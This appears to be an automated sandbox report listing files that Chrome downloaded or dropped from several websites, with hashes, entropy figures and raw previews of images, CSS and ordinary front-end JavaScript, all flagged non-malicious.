                                          Preview:......JFIF.............C...........................".##!. %*5-%'2( .?/279<<<$-BFA:F5;<9...C...........9& &99999999999999999999999999999999999999999999999999......x.........................................................................................@..T......T...T.:..`.X..V.....B..M................. D.X...e...e.............(..............*.....@.................D....P......Y@.@....R.....P...U........!...!.t.".........I .......P.....h..@..@ P......$.QTP...PI11[b.[+A@.I..`...............)M..%Y%@...L.U"Q6.J.aQ..........................@..L.......X........"...@...( .($..... ..X...,.........*...... "t.D N...B.......[.@........YEP........".:....4.............$.............B...(A....."-A.%Ye..%YX...).d-..$..V.....$..*............D.l.*N.T.-lb..PR..DJ........"..........M"......&P.......h........................U.................b..*.P..DM............@.l....*..Y..@......+ .............................:..P.(.@ P...L.H...%I+T...X.A2....ex....DEX..`....*.......jR....M....DI+\.".+J..PE"e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):648
                                          Entropy (8bit):4.267287996195597
                                          Encrypted:false
                                          SSDEEP:12:gKBcNKRdZwoRQtjfYaRYi0AxCVC3B6EarRPdyj8IjES:FZdRPaRYi0JA3B6EeRXW
                                          MD5:CCDBA8A8ED118A385B33092B30261504
                                          SHA1:E41C77D81641795FC0CCC109C4A058EE5AB94BCE
                                          SHA-256:E28B393862A9191FE08877274EBCBB34D820752593FE4923B20782E5267A4C12
                                          SHA-512:17052CB717CA7A2A392F75A8888C51D363FB7149F3B9664924B38E6A33E7B3596C6AA72A4713B9E35129D0118D9259215AC307D3E95B80EF052707330237A28C
                                          Malicious:false
                                          Reputation:low
                                          Preview:.function _openSelectLink(selecto, linkname, addclicktimename)..{.. if(linkname == undefined || linkname == "").. linkname = "value";.. .. .. var index = selecto.selectedIndex;.. var option = selecto.options[index];.. .. var url = option.getAttribute("value");.. if(addclicktimename != undefined && addclicktimename != "").. {.. try.. {.. eval(option.getAttribute(addclicktimename)).. }.. catch(e).. {.. }.. }.. .. window.open(url);.. .. if(selecto.selectedIndex != 0) .. { .. selecto.selectedIndex = 0; .. } ..}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 45887
                                          Category:downloaded
                                          Size (bytes):10933
                                          Entropy (8bit):7.978289769452813
                                          Encrypted:false
                                          SSDEEP:192:Y7dGgHQd6sC8ZiM9irmQ5+XLTMf9Yoet/NaNzLlMv2EjpNVm4S7L9X+1D:mdGDdqdEiip265/MfMv1VtkJw
                                          MD5:9201993F84E8B463DFB0D3C14506D2EA
                                          SHA1:04A2291EDF290569ED67B1C09E5C29F4E7676EA0
                                          SHA-256:BF481B607E2C60EA256B23BBAE8A0BEEC2B3FCEF5190B6453E6C2E1D09894525
                                          SHA-512:3E63465F276EA05228FB160B246DBD59E7E1B7967BB7FAB493257218BB55B89314CC5D53FF3778815BCCD41E23D726F67FFDA2D00BA1A85E732FF8DD8C3E6B2A
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/bootstrap/bootstrap.js?v=1736150851437
                                          Preview:...........}kw.F............xrg.4.c[....7Vf.Z.,DB.......G....g..$..=..X..Q]]]]U]].8.r._z_.^TUS7.|.{.d.d..^..i....wEs.y.Iu.b....|w...:z....|.;.)..X.z..!.......V.i..}.......l.V......M.......:...._....+l.._..e9/.g...X......r5.4e5...........{..eY..c.i..6W..7/nz...j.OL........N...-....eQ..$..v.......X..../.C.hX/fe.OzIzvt.o.$..^}..9O......O....Nn.=v...O........{<...q.Z..`..%to.$.{.......%>..O.L.b.M...7.......~bF...E.:.|......:..kq.K.....&H.....7..E.........M'..........^9. L.U.u.aV.a..,3....f.....Q.6W.l6\.w...bC.S\.f@;.....t...I>.g..r.6.v....*..n...!t.._.D4..[..,W...S.../.S....%...>.......e.wX...j..-...k`.q]4..uQ...B.........v.......I..+...r.Hp.x..g....E9...|.u.a0-f.;.......tV.L..".n..6...e:,k...W.....?..r./...Tn..h".@..&.8Z....:{t6..@_.. 6..#....b....F...^...........NfU]..1U....o_..}..&H$.....}}...?......=..Hr...P.2..%.q*......5.z.T...y.$.N1.Yn.h..6Z.jY\BI...{{.4\..Y>).../....g........p...#........i...~.S....j.....!W.........,1k..<
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (3711), with no line terminators
                                          Category:downloaded
                                          Size (bytes):3711
                                          Entropy (8bit):5.0622390478438515
                                          Encrypted:false
                                          SSDEEP:96:5mIye9kXARbKZ3O0e8WdWyKZSz7lo/S9dgyOn4BdC:Xygkcw5sDoa9xrC
                                          MD5:A52EE49FE4AFFF274F8C30FE880DDC13
                                          SHA1:6E9F90F5D82324DED047FCB1EE3A69AAED0F9C91
                                          SHA-256:0EAA691F4B80B80FE92BD5DCFA943126C6BAC2E4F6AC1E586DE155FA1C287360
                                          SHA-512:FCF79C53EB405B42ED5D0AFE2B309BE3B96CE3F80562CD3669F3239764B9CAFF8FA16BC01D4FDCA12A2E2B624BF259547E350DD205CE77919A1CE0544251F252
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/quicklink.umd.js
                                          Preview:!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n(e.quicklink={})}(this,function(e){function n(e){return new Promise(function(n,r,t){(t=new XMLHttpRequest).open("GET",e,t.withCredentials=!0),t.onload=function(){200===t.status?n():r()},t.send()})}var r,t=(r=document.createElement("link")).relList&&r.relList.supports&&r.relList.supports("prefetch")?function(e){return new Promise(function(n,r,t){(t=document.createElement("link")).rel="prefetch",t.href=e,t.onload=n,t.onerror=r,document.head.appendChild(t)})}:n,o=window.requestIdleCallback||function(e){var n=Date.now();return setTimeout(function(){e({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-n))}})},1)},i=new Set,c=new Set,u=!1;function a(e){if(e){if(e.saveData)return new Error("Save-Data is enabled");if(/2g/.test(e.effectiveType))return new Error("network conditions are poor")}return!0}function s(e,r,o){var s=a(navigator
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 168x168, components 3
                                          Category:downloaded
                                          Size (bytes):6871
                                          Entropy (8bit):7.872376472792791
                                          Encrypted:false
                                          SSDEEP:192:p7FikLUR+6X7MCy5nSb1jSG99DX8yclWGo2yscY8:pfA3+gSGjX25+Y8
                                          MD5:99BE4BFE275809D4E436B77C991B1381
                                          SHA1:54EADEE77394EB62CCF377AE68D9F49ACB5B6785
                                          SHA-256:4CA35131972ACDF420B94F0D64A5A0F504EB5A7B0E6FB7B8B467916A12AAE37D
                                          SHA-512:452A79B02619ED5C1E4F81FC5A4A209CB8A11D03AADB1841AE9BE18FBCA088652CDB54340329C1BF57771ABFB02FFED4BF75B61F4DF96866B7F2358C36AE75A3
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg
                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:D4BE92C0D83711E8AF8CAD9701B14EA4" xmpMM:DocumentID="xmp.did:D4BE92C1D83711E8AF8CAD9701B14EA4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D4BE92BED83711E8AF8CAD9701B14EA4" stRef:documentID="xmp.did:D4BE92BFD83711E8AF8CAD9701B14EA4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 33266
                                          Category:dropped
                                          Size (bytes):9892
                                          Entropy (8bit):7.972508432424258
                                          Encrypted:false
                                          SSDEEP:192:qlehYXevG1OuZAPpHaU3WabIgwkhTiROULU+YODxuc4T8VsS5o9sAPPj5KO:JhGevKOyAP59byE+ROULU+YAp44sJ9sY
                                          MD5:663F03599096BCF1699EF7D93FA0540D
                                          SHA1:DDD8375E5C1E2F58E9E0C80A7A58BECCA0EF4993
                                          SHA-256:2C414450E603199DF8F068A30C5C445DED725BB7C9EB13DF3FD20051E0CD8672
                                          SHA-512:63C812CA5A66943611F522A9ADB73D9F66D022C0126F9E066CF72EE19F2765AE65F1CEC1A8E2B8FCF4C5F06F76805B68699C35DBA138D1C1F4BEF39706ED9784
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........=kSS...W(.].......:c.=.L..}....T*...:$1'.\.[...@@QDA....Pi......9I>..f....g.W........^k....\.f.t.........dG$.M..o.X....R...............CK8.Bk1W&.-kd..{...?5..5..+....d....K.v..R[._)N...>.5.W...Va.|=[}...4.=...$R...qg.>..>.e.......Ao......W.PF..............S.....S.n=.m,..........._..C..Ju.I-.smn..x..K.B....OS.(..s.G.....m..uk._3....#....S...'..|:`....r..Mv......x....V./l................|.\yH.<.j-,.v..J..VLS.e...>un=.H.u../.....`i......a..xm...._.....CKw.f..U.v!..28m.\yS....V.aDc...x...!.N'zC.x:.5.=k..).R.\..V..f..}.`.l.\*.-.....d.[..@.f.v..0g....I.F.G.xf......f~..[.....W..9....x.x..Z.yW_.2..a....=..Z.....5......z&..@x.<6.Ek..z..$z..=3.....&...g4'.a.=p"ep8TJyk.I}y.,=m....Z<....>.+.@[~PH.o....6...&...h.............8?p....5.6...V.....=.Y..}..'...gW..8...+....mA..Lc..)G..x2nt).!.V.w..'.........oM..ry4...,..p4.I..h&+[.N...v..*.';..+.T.C.%.BC..Z.....S:....D..G.st.h.R...z.^i.K......d-..@.!?p .0p..F.k.`.uL.M$.1....A...n}8
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 560 x 82, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):60109
                                          Entropy (8bit):7.944071406207154
                                          Encrypted:false
                                          SSDEEP:1536:e3jgDcKyxLkr6REo6aCZkgP/DOB9CRzWVZLHujOf:Sj9/grSEHZR3D09CmxOje
                                          MD5:C70F5C2BFA7CF697A0FF52C53E8CDECA
                                          SHA1:DBA8C3BF1A9910EF44457BD8EBA520242BCAE3B6
                                          SHA-256:056B11710BF843A85DF22FCFA2326AAC1494554C4B9A34FA9C667BD5689B9736
                                          SHA-512:79697EA8CF608CBC78BD01DF46DFABEC85DA9CCB6ECA55A3A4A347134C69660F58EA589B61C25DE47B34676AC3E40DD43148D3A5FB5804025B1E807996231CE2
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR...0...R.....JR......sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x...xprVWx..Mh.A..g3il..f.....+....(h.A.......QA.A*^<..hPW...Z.H.bCMi....DE.".......73~..A..Q......;K.%..|.$!.Zq..ck..MM..[..e..%...MW.~.....JYt0Vx+{z&..;o.n.T........\Evw..#se.../....jCC.do.#9<.jZ....o....Zk....|O..~.Zz....Le......c.e..1._..8..e'..%C.B.C9U.......|n......1y..KY..N....8.(...4e7..r.r...+.....Q....N...]9....F?Y.......@..;z..$....4....4u.c...b?...fD........X....Gu..`.6..0.a.......g..........(.'i.z.....i..PK.mA.Y...O...c.#i..>..{.k.0.C.?.................8.M.}.~.Y.......j...../...i..nm(..2.}q&.?....[f2. .N.m-L......_...+...\K.s..6.._^.#.....................ON.Q...]...5?..A................~.2AX~.Wu....HmkBF........................................................................).3.....mkTSx..]M.$GVN.=..?{e..4B.8x..U.a....nOuuMe...]...*gj.3m..w.H.V.......E.G....iO..H.@B..a/.9..x.EdVfVdUfv.t.9mwdfdFF|./......Q.]......9....a.J.=hT...>f
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12051
                                          Category:dropped
                                          Size (bytes):3316
                                          Entropy (8bit):7.9446882423582625
                                          Encrypted:false
                                          SSDEEP:96:HDAjAUuXSgof7U774DMcxFzOou3cVzXihx:HDARuXfofG7AMcyotGx
                                          MD5:902AE6C577FFAAD07A9FF299CE0AB884
                                          SHA1:294C86C2FC8DC7E2AACF10BEF6334E43466819F4
                                          SHA-256:225EFABD27CE5D8F1E842EFD8C5B987761E56EF00F0DCF0E38C10766D29A7904
                                          SHA-512:C0CE3989442018160307B28602EB0C76339D286CFE13C7382F1B4B1CF4FBE5F8A2838D0411E4303AAE89E93FAE104BB8E25E5C3D3CA1EA2A4CA06A20B24C9019
                                          Malicious:false
                                          Reputation:low
                                          Preview:............mO.G.;.b.:...;.}9.......`PL."k..pkv..u8."9..!..5.\..)m...UB.m~.k.)..y...].i....g.y.g......=....L7.[.Lm.TsQ.C.a..e...S=.==.L.\.]h m...h.d...:O^...x...7.z....]..}...5.c...#..........4.\*.....z.#. ^k../}...^.r$..b...../..6t.h......[k.fK...-1..|D...}.".@.GG..GG.)..).../...t.?.s...r....p).dt.P.<6Q.Z.....EQ.B.a.u.q....ITvks(..h^.1\.... w..R}tm....cU>B.,l..t.TP.F.....k`...s..9.8......i-.......5...U\].......KC$...;(q1:i.SzJ...8....>.\.f_.Af....yG..a6Kz....z....m_.d...j........6..uFb.b..UG..9m.t..so.)]....'../..7`'1..-..3.k.....U..>~.n..S.kSh....ei\..]....;[s.eNZ..Z.p......Le..........T.z}.|D.`...H.<..)..D.?......;j#.i.......a....Z.=.......'k...=.......x~.px...z.*.v.v...G.?8..R......?.".Y0+9..(...y.]..-.2.......o5'o.&.......>.[......-+..?..._hm/.:.Nom~...7.B.......+s9.T.D..t.....U...J...?.pH......)0.....Y...QN..z.F.C.=^....w....m.w........L.O.l....kvtn.Uk.}...J...~z...q.....h...%..........`./..b..v..L.....l.Cn.\...Ev.....b.T
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):927
                                          Entropy (8bit):5.8234641292335105
                                          Encrypted:false
                                          SSDEEP:24:l1hiyWwjx82lY2T37V9QYaAldM6yJ3V9ihaB/G0u:LuNn2vfmKdCJ3fvZvu
                                          MD5:F0C81F4E76558FD0CC483FF85D038024
                                          SHA1:1CF7F291BE455523C140445E92EF3BEDE84AB931
                                          SHA-256:2B8A3DDBC4BCF2326E62B0A55708AC72B37578FD9D1DAA47EDB9565B2F312D4F
                                          SHA-512:D9FEB390CBB5A0202898D890120E93A049C263C8AA6B6DC168DB0F4056C97B6D80BBC98E287FD0D97A3619C2A914AFBA17B462379975E3B33BD052F9CF45C080
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/tt_bg.png
                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:16C1369DC91811E7A5F5EA689ABD845E" xmpMM:DocumentID="xmp.did:16C1369EC91811E7A5F5EA689ABD845E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:16C1369BC91811E7A5F5EA689ABD845E" stRef:documentID="xmp.did:16C1369CC91811E7A5F5EA689ABD845E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx.bb``X..`.......g....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1200 x 400, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):40362
                                          Entropy (8bit):7.982468223427335
                                          Encrypted:false
                                          SSDEEP:768:L+hhTB9EEiY7pwXiDPy2QreNtKVNs3uUJKJysdKuBQMtmUqGmDYyxLfv:8tXiocwq25tKVNseU4Jy65DdmDVfv
                                          MD5:E8756F5A60A8553B7D9B26851BEBFA7D
                                          SHA1:09D5262BBBDFEC24E88B8FABA8A00E6B80B8E831
                                          SHA-256:5462953296CDF1F3EC26A1BDA5E1C1212FD09A07494B61BBA542100767600686
                                          SHA-512:BF8213ABC8E70852A572787AFD5BDA54EA525315D341410683A1C31A149AD787CD5E818338110DBC5DE1B17187C965D7B761201C75F3466E9D02601383943A74
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............kil....PLTE....*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.ub.tb.ub.ra.ub.ub.vc.ua.iZ.s_.ub.vb.uc.ub.vc.ta.uc.uc.p^.sa.r`.|h.^N.OB..o..y....*|.ub.kW.^H....}k..#.ZC.wd.vc.aK.dO.ta.mY.o[.q^.fQ.hS.s_.iT........._..:.~.yf.U>....xf3.yT...n[Z..*.s...}..C.....f..............x.....P.....lg...#.o.O7...............cl...........{i...r..........rd...l..... .mI...s_......%.q..........>..n...iiu............F..6.{.an.tc...h.......w.fk..... L...pe.zg..$%.\z.E/.t).n6.X.H/K...y`..".nf`.M..7N.Q..9,.Z..,..l....\qC.T..@..*...n.I..'..'..2..2..>.A'..#s.........)tRNS.w."D..f..3.U...F.....+...[Rb..8xl..P.%.[.....IDATx...[O.A...~...Zl.R..d..twvv..u..i.....Hm.R*....`.IM$...L..Z/.lmKU....e7.d..9s2...B..{.....'$..'..^...K@....D82.t.....!..._w.._...H\../.C.1..B..qO^.K...!.,..M...!t...#R.E/.+ E....!t...)....+E.8k!...;8.s.K..M.....j.X.!L.0t....a.B..u.'-.._.....J.:.k..9.3..J..hD..F......s..Z..)....v.#..........(.3..k...;.....'...........[G...........B'.........y
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (734), with no line terminators
                                          Category:dropped
                                          Size (bytes):734
                                          Entropy (8bit):4.868554581606508
                                          Encrypted:false
                                          SSDEEP:12:1cqBUdX00OlM3GryvrIqE/NtttAedDH0gh8q9ZupLfgDeZiMEdvjYvZF:1ckU100OWG+yrvdDH6qj+L/EdbYH
                                          MD5:62F09514F62F2C58E309B97F7EFF9498
                                          SHA1:B1D21B21AFF68B45A1F6974AF36072494B7C47A9
                                          SHA-256:1E22021B5E32AA80920143FD9CEAF19732FFDDE177D964C92D1C517ABDF32EB8
                                          SHA-512:A7179C68BCE3729FFE3CD393B6A458C4F24878AD6C7391D8AD04552B378209A4ABB3D5756078FB41E83E922C7AAFABDF4D0520FF7E70A8DB75827F543281EFD4
                                          Malicious:false
                                          Reputation:low
                                          Preview:define([],function(){var initializing=false,fnTest=/xyz/.test(function(){xyz})?/\b_super\b/:/.*/;this.Class=function(){};Class.extend=function(prop){var _super=this.prototype;initializing=true;var prototype=new this();initializing=false;for(var name in prop){prototype[name]=typeof prop[name]=="function"&&typeof _super[name]=="function"&&fnTest.test(prop[name])?(function(name,fn){return function(){var tmp=this._super;this._super=_super[name];var ret=fn.apply(this,arguments);this._super=tmp;return ret}})(name,prop[name]):prop[name]}function Class(){if(!initializing&&this.init){this.init.apply(this,arguments)}}Class.prototype=prototype;Class.prototype.constructor=Class;Class.extend=arguments.callee;return Class};return Class});
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x376, components 3
                                          Category:downloaded
                                          Size (bytes):357315
                                          Entropy (8bit):7.97919997746072
                                          Encrypted:false
                                          SSDEEP:6144:dKN4ObyG3+SUr9hBwIyEuBJAEXsPvNS2C9DOE49KJS7po31iqzw9UrxM7S+22KVV:uH3u9fvyrfAEoN1b0SNo31isvK7SLZ
                                          MD5:8C854415D5FAD91B4FF98ED380B2A4E2
                                          SHA1:F4ACE67D2E891B58ED5403631EF50DB85DFF9763
                                          SHA-256:59BAD777902D9189585E1E97DCAD7AEE83BBF611CEAD72E26B7EC6888AFF98E1
                                          SHA-512:001B4842AB46BDADF48E7FB9EBCD385A7EB8B651F736E5AE2482AED539321579083CC971B0A0A57434CF756AE99C4A6784315B97F7F285CEA47A33375CF2AA60
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-4.jpg
                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................x...............................................O............................!."1A..#2Qa.$3Bq.Rb..%Cr..4S..c.....&5Ds...'.....................................B........................!1A.Qa."q...2......B.#R..3b.r..$..C..4..............?....v..%`.i.$..~.....}.h0...S.&......B...W4..h..>..q.....nUh...mG...G....j..|.......+a......xD.9..1.{....)=...Z.F;.....l.U.[......N/..=...,.K...P.B.........e....T..G!\....]7.e.@..t.l$#G..A.V.M...0.&....M....`..j......!.x7K.2.VS.'.r.m..S$..;.Hi.H(...].6..{W......+..#..w5o...L'..%71p+.O=.1Y.%.=..!.w...O...._.b.....p..:.!W....$ ..(R.`.yHu....4.n.*.*..3_...i..........N...b.Vavc....v..];~..a.8...o$......1[.O.C.ey..k.ZQ..N...PYs......n..W}C1..la..n....`.v._/....f.._.;...y..uPsr/d._~.t......{?Y.....waw.Ka..> .e.u.-4t....=..A^..^%.tF.F3E...........=.<I...$
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1000 x 200, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):16171
                                          Entropy (8bit):7.957091246891598
                                          Encrypted:false
                                          SSDEEP:384:reyaj11iAYigzr+UggEO+SWnbpsGTfW2XipW0VzRyYOAqW:Kyi1sATgPZE8WbDFXJ0tI2f
                                          MD5:C0C473FF65D53364B57BAE47C1309DDD
                                          SHA1:62117432116DC2CF7C9DB76F20301D011E6C33B5
                                          SHA-256:6ED60433BD74F4340F70783C9037C1614A6578188642F74AEDF451101EBFB3E8
                                          SHA-512:0D0DEDBE83A264DB883CA08B7F9DE8174B9C21F1D9A911B0CA21382E62B9B9464B95785206594CF8EFA72B856A33A40CD23A73327CB6364428863D0768D49961
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/banner/banner.365.png
                                          Preview:.PNG........IHDR.............L9;}....PLTE.....l.......59......r........&..*.r2.V6.F6........"..*....."...\.T..'5.|..........)..b6J...1.........l.>...t...........&.!*..74.`.~2..[ .u.9.....(.f......6...."B...6..D...:..+.....b../X.........3h.F.\..'.{....>?.....!G....t.K... `...VW.....2.....>e.Iy....J.....(L.^.....n..z.......O....6..........w.............*..I....D.S...G...d...MQW............,4C....,.............".t..........?........f...9..HK.......~...l.*'.#....#x...........G...|....../......~........a...bm..`[.........wt..Y.............O.........hj.[X....?<...."...6<...7.P...h..:Z#........p'}.wG..0......g[,...........X.t...V5..BJ.44.N.F.x..Z....2.n.n..f+....tRNS.@..f..<WIDATx...1k.0...K......n..C.................U...]..^.$.1...].!r...9 .....9 .....9 .....: .....9 .....9 .....: .....9 .....: .../.`....y..?....sUcB.6E..Uf.g........&S[!t<.5..8...mb't..E.q...j5B.P0...n..1%k..\.3<..Py..N.k.Z..1f......Q..:.3..._....m.(.~]].Ir......:...y..o....{.]./oNc.}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (823), with no line terminators
                                          Category:downloaded
                                          Size (bytes):823
                                          Entropy (8bit):4.974800086001171
                                          Encrypted:false
                                          SSDEEP:24:N+KqXZuq2Zqoiedh1cCMKQYcQbcDLKJcww+:NKe5H1c2cecAcwN
                                          MD5:52385F65CE1A204CED660AD6D6FEC49F
                                          SHA1:015DA85FE677E3AC6B787EC85DCDFFCE6B1BD8C4
                                          SHA-256:F75B1A3B7C9491C5D617760E6ACDAC309B5FBFE5FE31E39ABDC4BC0D3E00A0D7
                                          SHA-512:AD53881C5E46CAB4717690C1F47EB7DB35730305FF51E53E8B6B743AC16B605330E16C5C1389DD0EDBF9C170CEB75D6D849F0ADB1D07C119826DDE38D233D936
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/jquery/plugins/jquery.poshytip/poshytip.css
                                          Preview:.poshytip{opacity:.8;z-index:9999;text-align:left;border-radius:4px;-moz-border-radius:4px;-webkit-border-radius:4px;padding:8px 8px;color:#fff;background-color:#000}.poshytip .tip-inner{font:bold 11px/14px 'Lucida Grande',sans-serif}.poshytip .tip-arrow-top{margin-top:-5px;margin-left:-5px;top:0;left:50%;width:9px;height:5px;background:url(poshytip_arrows.gif) no-repeat}.poshytip .tip-arrow-right{margin-top:-4px;margin-left:0;top:50%;left:100%;width:5px;height:9px;background:url(poshytip_arrows.gif) no-repeat -9px 0}.poshytip .tip-arrow-bottom{margin-top:0;margin-left:-5px;top:100%;left:50%;width:9px;height:5px;background:url(poshytip_arrows.gif) no-repeat -18px 0}.poshytip .tip-arrow-left{margin-top:-4px;margin-left:-5px;top:50%;left:0;width:5px;height:9px;background:url(poshytip_arrows.gif) no-repeat -27px 0}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (3347), with no line terminators
                                          Category:dropped
                                          Size (bytes):3347
                                          Entropy (8bit):5.179155367420231
                                          Encrypted:false
                                          SSDEEP:96:pIjmgaIUP0enqqsJxRDd4do6skj79o5kX2:pIigaIDqsJxRDd4do6sU790kX2
                                          MD5:AC15AE6CB84A28F7C6A21D9BA34799FD
                                          SHA1:E3A576CD862B5CD018C18F62FD9E5023B2C06D73
                                          SHA-256:17A5BCC92FC623EA30802FC2325397D4F4533193CB8FFB13766ACB8A726E78FE
                                          SHA-512:5FD32A09FB9DC8AACEA1296E6B1C48C326B73C95EDF47186A026658964367AF368B9029C25534C4D76E3E76D1197040F9BCA81AB88D8A664CACABF0AE504AD06
                                          Malicious:false
                                          Reputation:low
                                          Preview:var _vsb_multiscreen;if(typeof(_vsb_multiscreen)=="undefined"){var _vsb_multiscreen=new function(){var d=this;var a="vsb_screen_set_device";var k="vsb_screen_reload_count";var b=300;var g=2;var h="vsb_screen_reload_url";var i=30;var e="_vsbscreen";var c="devices";var f="pc";var j={"useragent":{"browsers":"","mobilebrowsers":{"device":[{"name":"KindleFire","typeName":"pad","content":"(KFAPWI|KFTHWI)"},{"name":"PlayBook","typeName":"pad","content":"RIM Tablet"},{"name":"iPad","typeName":"pad","content":"iPad"},{"name":"NexusPad","typeName":"pad","content":"Nexus ([7-9]|1[0-2])"},{"name":"Xoom","typeName":"pad","content":"Xoom"},{"name":"GalaxyTab","typeName":"pad","content":"SCH-I800"},{"name":"MiPad","typeName":"pad","content":"MI PAD"},{"name":"SamsungPAD","typeName":"pad","content":"(SAMSUNG SM|SM-T)"},{"name":"iPhone","typeName":"mobile","content":"iPhone"},{"name":"iPod","typeName":"mobile","content":"iPod"},{"name":"Android","typeName":"mobile","content":"Android"},{"name":"UCMobil
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 24048
                                          Category:downloaded
                                          Size (bytes):5527
                                          Entropy (8bit):7.954145821467071
                                          Encrypted:false
                                          SSDEEP:96:S2QR56r5uDcGIVkeWxFeIqb9OwNUXQCLHQtpestT7iji+E3ZlG2C1H5z7lvF7P:sKrsDYxMkFHNcQb3tT7iu+OG2CBXFP
                                          MD5:611CF746ED3EDFDC9F541F7D307EF9D2
                                          SHA1:8878CC17DE6200A8BA50B6465609EE2404D024BB
                                          SHA-256:BDE466B58AD4F5E4F36AEC906374C6A34F79763FE5B0E0D05ED952544554C210
                                          SHA-512:594B080256B6C5FB1E21B0280EEB541578DD3529891ECFBEF2B2175FC349A76C20EECF778BE8E7B7FCABCB48C201D246B2F02494B2F9B4B3A205306ABC632169
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/font-awesome/font-awesome.css
